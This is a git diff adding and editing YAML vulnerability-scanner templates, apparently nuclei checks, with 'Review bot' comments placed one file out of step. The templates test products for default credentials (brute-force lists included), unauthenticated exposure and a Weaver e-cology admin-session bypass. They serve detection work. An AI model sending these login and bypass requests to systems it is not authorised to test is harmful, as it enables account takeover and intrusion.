-# digest: 4b0a00483046022100833d91ba2032752ec44beaa26f94e9f5c828ba8ede4df27a8a5e179834a6b4ee022100d56fa523bcf08fbd1b5a7ed5c1ec9718ac1b9a52f461c5edcebda387530765fe:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022057b135d11bf810e830e05881ffc3254f26c1436f37bcd9d9b4542bcde8755427022010d1ddee07bed42e9d2a7428aaeff2b6a8df455ea5f97e6b267b19cbc8889b20:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/auth/chatgpt-web-unauth.yaml b/poc/auth/chatgpt-web-unauth.yaml
index e013627b64..022ec62b2a 100644
--- a/poc/auth/chatgpt-web-unauth.yaml
+++ b/poc/auth/chatgpt-web-unauth.yaml
@@ -4,6 +4,7 @@ info:
 name: ChatGPT Web - Unauthorized Access
 author: SleepingBag945
 severity: high
+ description: ChatGPT Web is exposed.
 metadata:
 verified: true
 max-request: 1
@@ -37,5 +38,4 @@ http:
 - type: status
 status:
 - 200
-
-# digest: 490a00463044022025e67a1afa68039433f2eeb68afb01b6cefcf700d2976a83d01845f87a2cfcf902204c852c5d7b15d180a10864001521e703eddde47ab3722d0090b6bfbf62f4b3f5:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450221009335765c3a461281c6686e5525ef4df6ad033b509221998c003f467783efccbe022002fed2ad57b70a38346af4229f8309b5d16a21de09c245e1af3638f9d0086475:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/auth/clickhouse-unauth-api.yaml b/poc/auth/clickhouse-unauth-api.yaml
index 8a8675129c..98f1a624df 100644
--- a/poc/auth/clickhouse-unauth-api.yaml
+++ b/poc/auth/clickhouse-unauth-api.yaml
@@ -4,6 +4,7 @@ info:
 name: ClickHouse API Database Interface - Improper Authorization
 author: DhiyaneshDk
 severity: high
+ description: Clickhouse API Database is exposed.
 reference:
 - https://github.com/luck-ying/Library-POC/blob/master/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93%208123%E7%AB%AF%E5%8F%A3%E7%9A%84%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.py
 - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/redteam/vulnerability/unauthorized/ClickHouse%208123%E7%AB%AF%E5%8F%A3.md?plain=1
@@ -12,7 +13,7 @@ info:
 max-request: 1
 shodan-query: "X-ClickHouse-Summary"
 fofa-query: "X-ClickHouse-Summary"
- tags: clickhouse,unauth,disclosure
+ tags: misconfig,clickhouse,unauth,disclosure

 http:
 - method: GET
@@ -36,5 +37,4 @@ http:
 - type: status
 status:
 - 200
-
-# digest: 490a00463044022036599550131f2de458fc72e772f69cae1e3aa73931f856c352ff8ebc85d72ac7022004567b098e2ae9a91cc1f46ed381cb9c41b904d4393b286fbc3cf77bd930d4ae:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100a0b5c453b540196a3297c18713c3638b6327d815009a24c1b054e31cd98ab0ab02203243446e5cb8801e67889a19c0c6dd4298a25228b1181c835f909574b5096336:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/auth/dataease-default-login.yaml b/poc/auth/dataease-default-login.yaml
new file mode 100644
index 0000000000..de2c5d7694
--- /dev/null
+++ b/poc/auth/dataease-default-login.yaml
@@ -0,0 +1,45 @@
+id: dataease-default-login
+
+info:
+ name: Dataease - Default Login
+ author: DhiyaneshDK
+ severity: high
+ description: |
+ Dataease has a built-in account demo/dataease, and many developers forget to delete or change the account password.
+ As a result, many Dataease can log in with this built-in account.
+ reference:
+ - https://github.com/dataease/dataease/issues/5995
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: html:"Dataease"
+ tags: default-login,dataease
+
+http:
+ - method: POST
+ path:
+ - "{{BaseURL}}/api/auth/login"
+
+ headers:
+ Content-Type: application/json
+
+ body: |
+ {
+ "username": "HmFJtDmMa9MZjlWEpCNAo7Yh/hRBI7mrCRfFTok7wES7qcpIJ04x0OQXW5fwtL4WtN29408wyAupmtMjvvXjag==",
+ "password": "sL+oQsnErJMYGiLyzXj/Hy2opaZcSnfjGtYtm48q8tdkkINxzTtAOFI2NgDoorchFE790vWQYIgo1CMyjJ2jnw==",
+ "loginType": 0
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"success":true'
+ - '"token":'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+# digest: 4a0a00473045022100f845a84ad7189dffccd1afea970ebb8f5e601b044da1562e014ab66c8f70e3a9022066c79ccdd3db85aae25fffd20633c098d785a2769347ea37c120f0fb36b1fc0e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/auth/ecology-verifyquicklogin-auth-bypass.yaml b/poc/auth/ecology-verifyquicklogin-auth-bypass.yaml
new file mode 100755
index 0000000000..4584920761
--- /dev/null
+++ b/poc/auth/ecology-verifyquicklogin-auth-bypass.yaml
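Review bot: The request body sends two fixed opaque `username`/`password` blobs while the description talks about the `demo/dataease` built-in account, and nothing in the template links the two; a reader cannot tell whether the blobs are the client-side encrypted form of those credentials, which key produced them, or whether they stop working when the frontend key changes. Add a comment above `body:` such as `# username/password below are the encrypted forms of demo/dataease that /api/auth/login expects — regenerate if the frontend encryption key changes (TODO confirm)`. Because the values are hardcoded there is also no `payloads:` block, so operators cannot override the credentials the way the other default-login templates in this batch allow; if the encryption cannot be reproduced with nuclei helper functions, say so in the same comment.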
@@ -0,0 +1,38 @@
+id: ecology-verifyquicklogin-auth-bypass
+
+info:
+ name: Weaver e-cology verifyquicklogin.jsp - Auth Bypass
+ author: SleepingBag945
+ severity: high
+ description: |
+ There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package.
+ reference:
+ - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
+ metadata:
+ max-request: 1
+ fofa-query: app="泛微-协同办公OA"
+ tags: ecology,weaver,oa,auth-bypass
+
+http:
+ - raw:
+ - |
+ POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ identifier=1&language=1&ipaddress=x.x.x.x
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "\"sessionkey\":"
+ - "\"message\":"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4b0a00483046022100cfd4d41d929b8e53906785ad3b7a060a9332012c1c1f1a29ecf69bd8372bdb3b022100de10a869048be60516db1032c67b36751b14daa03450d34da001f799731cd0e8:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/elasticsearch-default-login.yaml b/poc/auth/elasticsearch-default-login.yaml
new file mode 100644
index 0000000000..330f016c3d
--- /dev/null
+++ b/poc/auth/elasticsearch-default-login.yaml
@@ -0,0 +1,53 @@
+id: elasticsearch-default-login
+
+info:
+ name: ElasticSearch - Default Login
+ author: Mohammad Reza Omrani | @omranisecurity
+ severity: high
+ description: |
+ Elasticsearch default credentials were discovered.
+ reference:
+ - https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610
+ - https://www.elastic.co/guide/en/elasticsearch/reference/current/built-in-users.html
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667
+ tags: default-login,elasticsearch
+
+http:
+ - raw:
+ - |
+ POST /internal/security/login HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows; Windows NT 10.1; Win64; x64; en-US) Gecko/20100101 Firefox/49.5
+ Referer: {{RootURL}}/login
+ Content-Type: application/json
+ kbn-version: 8.8.2
+ x-kbn-context: %7B%22name%22%3A%22security_login%22%2C%22url%22%3A%22%2Flogin%22%7D
+ Origin: {{RootURL}}
+
+ {"providerType":"basic","providerName":"basic","currentURL":"{{BaseURL}}/login","params":{"username":"{{username}}","password":"{{password}}" }}
+
+ payloads:
+ username:
+ - elastic
+ password:
+ - changeme
+ attack: pitchfork
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - 'Set-Cookie: sid='
+ - 'kbn-license-sig:'
+ condition: and
+ case-insensitive: true
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4b0a00483046022100a3408fad3b3714582be692b490de830c2bab27c538a3019730304baf29a3d925022100dedbe43013a6624ea26d84bfc6e3d742cb51405bcf8e14b5c137372eb72f7dd6:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/esafenet-cdg-default-login.yaml b/poc/auth/esafenet-cdg-default-login.yaml
new file mode 100644
index 0000000000..93cf1ce1f1
--- /dev/null
+++ b/poc/auth/esafenet-cdg-default-login.yaml
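Review bot: The request goes to `/internal/security/login` with `kbn-version: 8.8.2` and `x-kbn-context` headers and expects `kbn-license-sig:` in the response, all of which belong to Kibana's login API rather than to Elasticsearch itself, so `name: ElasticSearch - Default Login`, `tags: default-login,elasticsearch` and the `shodan-query` describe a different product than the one the template authenticates against. Rename it along the lines of `name: Kibana - Default Login (elastic built-in user)` and add a `kibana` tag, or state in `description` that the Elasticsearch built-in credentials are tested through Kibana. The hardcoded `kbn-version: 8.8.2` is a further limitation: to my knowledge Kibana rejects requests whose `kbn-version` header does not match the running server, so instances on other versions will not match even with `elastic:changeme` in place; either extract the version from the login page in a first request or note the restriction in `description`.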
@@ -0,0 +1,56 @@
+id: esafenet-cdg-default-login
+
+info:
+ name: Esafenet CDG - Default Login
+ author: chesterblue
+ severity: high
+ description: |
+ Esafenet electronic document security management system default credentials were discovered.
+ metadata:
+ verified: true
+ max-request: 32
+ fofa-query: esafenet
+ tags: esafenet,cdg,default-login
+
+http:
+ - method: POST
+ path:
+ - "{{BaseURL}}/CDGServer3/SystemConfig"
+
+ headers:
+ content-type: application/x-www-form-urlencoded
+
+ body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}"
+ attack: clusterbomb
+ payloads:
+ username:
+ - "systemadmin"
+ - "configadmin"
+ - "secadmin"
+ - "docadmin"
+ password:
+ - "Est@Spc820"
+ - "12345678"
+ - "123456"
+ - "Est@Spc2018"
+ - "Est@Spc2019"
+ - "Est@Spc2020"
+ - "Est@Spc2021"
+ - "Est@Spc2022"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "est.connection.url"
+
+ - type: regex
+ part: body
+ regex:
+ - "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}"
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4a0a00473045022100e6e8037638c7053279429fb10ae4c9c6af87bb9bdbad0ffe087b547602459da902202536491397bc2e5c2c80d4d23ec7e65a7710ebf3e14aa5bc223315c1363deaa6:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/feiyuxing-default-login.yaml b/poc/auth/feiyuxing-default-login.yaml
new file mode 100644
index 0000000000..dbed124320
--- /dev/null
+++ b/poc/auth/feiyuxing-default-login.yaml
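Review bot: The regex matcher `(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}` does not express a "loopback or private address" check: the top-level `|` leaves `127.0.0.1` on one side and, on the other, the literal `localhost` immediately followed by a private-range prefix, so a bare `localhost`, `10.x.x.x` or `192.168.x.x` never matches, and the `10\\.` branch followed by `\\.\\d{1,3}` would require `10..`. Because the three matchers are `and`-ed, in practice only the `127.0.0.1` branch can satisfy this matcher today. A pattern such as `"(127\\.0\\.0\\.1|localhost|192\\.168\\.\\d{1,3}\\.\\d{1,3}|10(\\.\\d{1,3}){3}|172\\.(1[6-9]|2\\d|3[01])\\.\\d{1,3}\\.\\d{1,3})"` covers the cases the original lists. The 4x8 clusterbomb also has no `stop-at-first-match: true`, so all 32 requests are sent even after a hit; adding it as the kylin template in this batch does would reduce noise in the target's authentication logs.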
@@ -0,0 +1,51 @@
+id: feiyuxing-default-login
+
+info:
+ name: Feiyuxing Enterprise-Level Management System - Default Login
+ author: SleepingBag945
+ severity: high
+ description: |
+ Attackers can log in through admin:admin, check the system status, and configure the device.
+ reference:
+ - https://github.com/wushigudan/poc/blob/main/%E9%A3%9E%E9%B1%BC%E6%98%9F%E9%BB%98%E8%AE%A4%E5%AF%86%E7%A0%81.py
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: title="飞鱼星企业级智能上网行为管理系统"
+ tags: feiyuxing,default-login,iot
+
+http:
+ - raw:
+ - |
+ POST /send_order.cgi?parameter=login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ {"username":"{{username}}","password":"{{password}}"}
+
+ attack: pitchfork
+ payloads:
+ username:
+ - admin
+ password:
+ - admin
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"msg":"ok"'
+ - '"type":'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'hash_key='
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4a0a0047304502201fb4a76b318f9c3a0993dd312148f6a0823954ab3354a41be198c6917ee1c059022100ad6214108becac7c0bdcd5a523f67d04cde7b3efbfc1d4e1a9395c79f992af0f:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/fusionauth-admin-setup.yaml b/poc/auth/fusionauth-admin-setup.yaml
index ca258391c6..16b895fbd1 100644
--- a/poc/auth/fusionauth-admin-setup.yaml
+++ b/poc/auth/fusionauth-admin-setup.yaml
@@ -4,6 +4,7 @@ info:
 name: FusionAuth Exposed Admin Setup
 author: ritikchaddha
 severity: high
+ description: FusionAuth Admin Setup is exposed.
 metadata:
 verified: true
 max-request: 1
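Review bot: The raw request declares `Content-Type: application/x-www-form-urlencoded; charset=UTF-8` but the body is a JSON object, and nothing explains the mismatch; if the CGI endpoint reads the raw body regardless of the declared type that is worth stating, because a future maintainer will otherwise "fix" the header and break a template marked `verified: true`. Add a comment above the raw block such as `# send_order.cgi reads a JSON body even though the UI posts it as form-urlencoded — keep the header as-is (TODO confirm against a live device)`. The `'"type":'` body word and the `hash_key=` header word are generic; if the success response carries a more specific token, prefer that to reduce false positives.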
@@ -27,5 +28,4 @@ http:
 - type: status
 status:
 - 200
-
-# digest: 4a0a004730450220376b6bd64a81c4ef24447743216a081ba75c3f722d4c2d3ac96241eff2cef6c3022100a543c922c5146f3d4219bb5b2b070fb1bb86e81ceca7f376066a3a4a1535132b:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022007d4dbb8a296fe926e5f296078aecfd6e737a4478b5ce8761f2de44c8620c953022018807ad838fddfa4096e7915fccf574e67b1c1b935d5c10d07082af0640b8632:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/auth/grafana-login-check.yaml b/poc/auth/grafana-login-check.yaml
new file mode 100644
index 0000000000..af3016bbb2
--- /dev/null
+++ b/poc/auth/grafana-login-check.yaml
@@ -0,0 +1,55 @@
+id: grafana-login-check
+
+info:
+ name: Grafana Login Check
+ author: parthmalhotra,pdresearch
+ severity: critical
+ description: Checks for a valid login on self hosted Grafana instance.
+ reference:
+ - https://owasp.org/www-community/attacks/Credential_stuffing
+ metadata:
+ max-request: 1
+ shodan-query: title:"Grafana"
+ fofa-query: title="Grafana"
+ tags: login-check,grafana,creds-stuffing,self-hosted
+variables:
+ username: "{{username}}"
+ password: "{{password}}"
+
+http:
+ - raw:
+ - |
+ POST /login HTTP/1.1
+ Host: {{Hostname}}
+ accept: application/json, text/plain, */*
+ DNT: 1
+ content-type: application/json
+ Origin: {{BaseURL}}
+ Referer: {{BaseURL}}/login
+ Cookie: redirect_to=%2F
+
+ {"user":"{{username}}","password":"{{password}}"}
+
+ extractors:
+ - type: dsl
+ dsl:
+ - username
+ - password
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Logged in'
+
+ - type: word
+ part: header
+ words:
+ - 'grafana_session'
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4a0a0047304502207fa6c2d6cce086e723ac4fbf51dae2962116ee41bba7e62675dbc198c086354e022100c32ffecff72430025fa4c185f2d10781096541768e3c843e9e1c8e1d17022be6:922c64590222798bb761d5b6d8e72950
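Review bot: The `extractors` block emits `username` and `password` through a DSL extractor, so every successful match writes the working plaintext credential pair into nuclei's output and into whatever log or SIEM sink that output is piped to; the template is explicitly a credential-stuffing check (`tags: creds-stuffing`), yet neither the description nor a comment says that its results must be handled as secrets. Add a sentence to `description` such as `Matched results include the working username/password pair; treat the output as sensitive.` or keep only `username` in the extractor. The `variables:` block maps `username`/`password` to `{{username}}`/`{{password}}`, i.e. to themselves, and `metadata` has no `verified:` entry, so a short note on how the payload lists are expected to be supplied at run time would help operators who find this template with `severity: critical`.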
diff --git a/poc/auth/grav-register-admin.yaml b/poc/auth/grav-register-admin.yaml
index 66d50ca997..4da6743163 100644
--- a/poc/auth/grav-register-admin.yaml
+++ b/poc/auth/grav-register-admin.yaml
@@ -4,6 +4,7 @@ info:
 name: Grav Register Admin User - Detect
 author: DhiyaneshDk
 severity: high
+ description: Exposed Grav admin user register page.
 metadata:
 verified: true
 max-request: 1
@@ -27,5 +28,4 @@ http:
 - type: status
 status:
 - 200
-
-# digest: 4b0a00483046022100f2e80bf84c5f0486850225ad39b99121e662f111e55e0a2dc064fcce9cc3995c022100e1ff1569b790382c69dcba5b1b82edab35961cfc529adff2a8bf7ac697db0040:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100fee93345e98c4b7f5f6b1346f747fae537d02194b62d3c9c653542d472b10d7a02200ad9542dc8d977f677e61266dc7d2aecb4d540ced8f44ec80086f6d8705f0916:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/auth/kylin-default-login.yaml b/poc/auth/kylin-default-login.yaml
new file mode 100644
index 0000000000..cb1fb20d6c
--- /dev/null
+++ b/poc/auth/kylin-default-login.yaml
@@ -0,0 +1,55 @@
+id: kylin-default-login
+
+info:
+ name: Apache Kylin Console - Default Login
+ author: SleepingBag945
+ severity: high
+ description: |
+ The default password for the Apache Kylin Console is KYLIN for the ADMIN user in Kylin versions before 3.0.0.
+ reference:
+ - https://github.com/hanc00l/pocGoby2Xray/blob/main/xraypoc/Apache_Kylin_Console_Default_password.yml
+ - https://github.com/Wker666/Demo/blob/main/script/%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B/Kylin/Apache%20Kylin%20Console%20%E6%8E%A7%E5%88%B6%E5%8F%B0%E5%BC%B1%E5%8F%A3%E4%BB%A4.wker
+ metadata:
+ verified: true
+ max-request: 6
+ fofa-query: app="APACHE-kylin"
+ tags: kylin,default-login,apache
+
+http:
+ - raw:
+ - |
+ GET /kylin/api/user/authentication HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Basic {{base64(username + ':' + password)}}
+
+ attack: clusterbomb
+ payloads:
+ username:
+ - ADMIN
+ - admin
+ password:
+ - KYLIN
+ - kylin
+ - 123456
+ stop-at-first-match: true
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"userDetails":'
+ - '"username":'
+ - '"password":'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ - type: status
+ status:
+ - 200
+
+# digest: 490a0046304402201fcf0b913c72b187052e4b5e7871e7d0e5b5df5339bb686cba1d688f6b12ab5702201e25e7c9eaedcea9be02d16d4759ab89f87e1bbd505c6144f94e671bc2b25db0:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/leostream-default-login.yaml b/poc/auth/leostream-default-login.yaml
new file mode 100644
index 0000000000..19ff436f70
--- /dev/null
+++ b/poc/auth/leostream-default-login.yaml
@@ -0,0 +1,53 @@
+id: leostream-default-login
+
+info:
+ name: Leostream Default Login
+ author: bhutch
+ severity: high
+ description: |
+ Leostream default admin credentials were discovered.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: http.title:"Leostream"
+ tags: leostream,default-login
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+
+ login_type=0&user={{username}}&password={{password}}&submit=SIGN+IN
+
+ payloads:
+ username:
+ - admin
+ password:
+ - leo
+ attack: pitchfork
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "Set-Cookie: lld=%21"
+
+ - type: word
+ part: header
+ words:
+ - 'index.pl'
+ - 'server.pl'
+ - 'status.pl'
+ condition: or
+
+ - type: status
+ status:
+ - 302
+
+# digest: 4a0a004730450221009d6b9b830062d1842295e184eb57d4ee56e1f1e4ef08c04432d2b7228f38ab4b02203ad0601a6b79882c8f54b7885cb11581f4eacf1ed0f5323f0b78c6014ad3a761:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/nacos-default-login.yaml b/poc/auth/nacos-default-login.yaml
new file mode 100644
index 0000000000..4d14e9d597
--- /dev/null
+++ b/poc/auth/nacos-default-login.yaml
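Review bot: The raw `POST /` carries a form-encoded body (`login_type=0&user=...&submit=SIGN+IN`) but no `Content-Type` header, unlike every other raw login template in this batch; many form handlers ignore a body that is not declared as `application/x-www-form-urlencoded`, so the `verified: true` run presumably hit a permissive server and other deployments may not parse the credentials at all. Add `Content-Type: application/x-www-form-urlencoded` directly under the `Host:` line. The second header matcher accepts any of `index.pl`/`server.pl`/`status.pl` with `condition: or`, which together with a 302 is a fairly loose success signal; a comment stating that the `lld=%21` cookie is only set after successful authentication, if that is what the author observed, would justify the combination.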
@@ -0,0 +1,58 @@
+id: nacos-default-login
+
+info:
+ name: Alibaba Nacos - Default Login
+ author: SleepingBag945
+ severity: high
+ description: |
+ The default username and password for Nacos are both nacos.
+ metadata:
+ verified: true
+ max-request: 2
+ fofa-query: title=="Nacos"
+ tags: nacos,default-login,alibaba
+
+http:
+ - raw:
+ - |
+ POST /v1/auth/users/login HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Nacos-Server
+ Content-Type: application/x-www-form-urlencoded
+
+ username={{username}}&password={{password}}
+ - |
+ POST /nacos/v1/auth/users/login HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Nacos-Server
+ Content-Type: application/x-www-form-urlencoded
+
+ username={{username}}&password={{password}}
+
+ attack: pitchfork
+ payloads:
+ username:
+ - nacos
+ password:
+ - nacos
+ stop-at-first-match: true
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"accessToken":'
+ - '"username":'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4a0a00473045022100f1e6f9c8dd27b0141b612bb668588d99e6709603a0cda653f7a1c6a7f882728d02202fb57fdfd3c7e625aed2f17eadc5a8ef82f752c7a5d50e963e616cbf763d639d:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/nodered-default-login.yaml b/poc/auth/nodered-default-login.yaml
new file mode 100644
index 0000000000..12548d6fb5
--- /dev/null
+++ b/poc/auth/nodered-default-login.yaml
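Review bot: Both raw requests set `User-Agent: Nacos-Server`, the identity string that older Nacos releases historically treated as a trusted server-to-server caller and exempted from their authentication filter, and the template does not say why a default-credential check needs it; with that header present a positive result may reflect the filter exemption rather than the `nacos/nacos` pair actually being accepted, which changes what the operator has to fix. Either drop the header or add a comment above the first request such as `# User-Agent kept for parity with the upstream PoC; the login endpoint still validates the submitted password (TODO confirm on a patched release)`. A sentence in `description` on why both `/v1/auth/users/login` and `/nacos/v1/auth/users/login` are tried would also explain `max-request: 2` and `stop-at-first-match` to readers.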
@@ -0,0 +1,51 @@
+id: nodered-default-login
+
+info:
+ name: Node-Red - Default Login
+ author: savik
+ severity: critical
+ description: |
+ Allows attacker to log in and execute RCE on the Node-Red panel using the default credentials.
+ reference:
+ - https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: http.favicon.hash:321591353
+ tags: default-login,node-red,dashboard
+
+http:
+ - raw:
+ - |
+ POST /auth/token HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded;charset=UTF-8
+
+ client_id=node-red-editor&grant_type=password&scope=&username={{username}}&password={{password}}
+
+ attack: pitchfork
+ payloads:
+ username:
+ - admin
+ password:
+ - password
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'access_token":'
+ - 'expires_in":'
+ - 'token_type":'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ - type: status
+ status:
+ - 200
+# digest: 4b0a00483046022100d8d30003eefbac42678e7c0af4ef56d03cd3238cba5804360b9614d7555be2d5022100816a15007caea2f57c4b763f5b060505ecf5d16be221481b679bd26dbc74583d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/auth/pyload-default-login.yaml b/poc/auth/pyload-default-login.yaml
new file mode 100644
index 0000000000..b626545bb3
--- /dev/null
+++ b/poc/auth/pyload-default-login.yaml
@@ -0,0 +1,46 @@
+id: pyload-default-login
+
+info:
+ name: PyLoad Default Login
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ PyLoad Default Credentials were discovered.
+ reference:
+ - https://pypi.org/project/pyload-ng/#:~:text=Default%20username%3A%20pyload%20.,Default%20password%3A%20pyload%20.
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: html:"pyload"
+ tags: default-login,pyload
+
+http:
+ - raw:
+ - |
+ POST /login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ do=login&username={{username}}&password={{password}}&submit=Login
+
+ payloads:
+ username:
+ - pyload
+ password:
+ - pyload
+ attack: pitchfork
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - 'Set-Cookie: pyload_session='
+ - '/dashboard'
+ condition: and
+
+ - type: status
+ status:
+ - 302
+
+# digest: 4b0a00483046022100887e6f5542621f9fd95a3e282c0a2de60e2fe8e1e0fc0fcbe1dd257885cb5d63022100a040e0e40efa61edc561c8aa3f0a00637973247e99c02bf2eef6d4d6a7aadbbc:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/splunk-default-login.yaml b/poc/auth/splunk-default-login.yaml
new file mode 100644
index 0000000000..8afecbbefe
--- /dev/null
+++ b/poc/auth/splunk-default-login.yaml
@@ -0,0 +1,69 @@
+id: splunk-default-login
+
+info:
+ name: Splunk - Default Password
+ author: pussycat0x
+ severity: high
+ description: |
+ Splunk Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
+ metadata:
+ verified: true
+ max-request: 9
+ shodan-query: http.title:"Splunk"
+ tags: default-login,splunk
+
+http:
+ - raw:
+ - |
+ GET /en-US/account/login?return_to=%2Fen-US%2Faccount%2F HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ POST /en-US/account/login HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate, br
+ Referer: {{BaseURL}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ X-Requested-With: XMLHttpRequest
+ Origin: {{BaseURL}}
+
+ {{cval}}&username={{username}}&password={{password}}&return_to=%2Fen-US%2F&set_has_logged_in=false
+ - |
+ GET /en-US/splunkd/__raw/services/server/health/splunkd?output_mode=json&_= HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate, br
+ Referer: {{BaseURL}}
+
+ attack: pitchfork
+ payloads:
+ username:
+ - "admin"
+ - "splunk"
+ - "root"
+ password:
+ - "admin"
+ - "splunk"
+ - "toor"
+
+ stop-at-first-match: true
+ host-redirects: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_3
+ words:
+ - "splunkd"
+ - "updated"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ internal: true
+ name: cval
+ part: header
+ regex:
+ - 'cval=([0-9]+)'
+# digest: 4b0a00483046022100ce91d4b9bd6a78ad0f1da61f3e9222cdb9db0f17bd4baa08ad302f1a57013161022100f2a44470cac093eedcba91b9a41d16f1c1141f063824121f54ebe9568bfab88f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/auth/teslamate-unauth-access.yaml b/poc/auth/teslamate-unauth-access.yaml
new file mode 100644
index 0000000000..845642aa56
--- /dev/null
+++ b/poc/auth/teslamate-unauth-access.yaml
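Review bot: The second request's body begins with `{{cval}}&username=...`, which only works because the `cval` extractor sets no `group:` and therefore yields the whole match `cval=<digits>` rather than the captured number alone; that reliance on the default group is easy to break when someone "tidies" the extractor and is not documented. Add a comment above the extractor such as `# no group: on purpose — {{cval}} must expand to the full "cval=<n>" pair the login form expects`. `max-request: 9` is consistent with three pitchfork pairs times three requests, but pitchfork pairs `admin/admin`, `splunk/splunk` and `root/toor` positionally; if the intent is to try each username with each password, `attack: clusterbomb` and an updated `max-request` would be needed. The third request's `_=` query parameter is sent with an empty value and can be dropped if it is only a cache-buster.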
@@ -0,0 +1,41 @@
+id: teslamate-unauth-access
+
+info:
+ name: TeslaMate - Unauthenticated Access
+ author: For3stCo1d
+ severity: medium
+ description: |
+ A misconfig in Teslamate allows unauthorized access to /settings endpoint.
